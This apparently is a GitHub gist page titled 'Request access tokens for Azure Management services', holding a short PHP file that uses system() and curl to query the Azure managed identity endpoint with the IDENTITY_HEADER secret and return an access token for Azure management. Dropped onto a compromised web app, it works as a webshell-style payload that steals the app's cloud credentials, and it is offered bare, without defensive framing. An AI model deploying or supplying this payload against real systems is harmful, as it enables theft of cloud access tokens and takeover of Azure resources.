Skip to content

Instantly share code, notes, and snippets.

@C0axx
Last active January 3, 2023 18:16
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save C0axx/50d30d98d7b453aa93350fed3f1a3f64 to your computer and use it in GitHub Desktop.
Save C0axx/50d30d98d7b453aa93350fed3f1a3f64 to your computer and use it in GitHub Desktop.
Request access tokens for Azure Management services
<?php
system('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER');
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment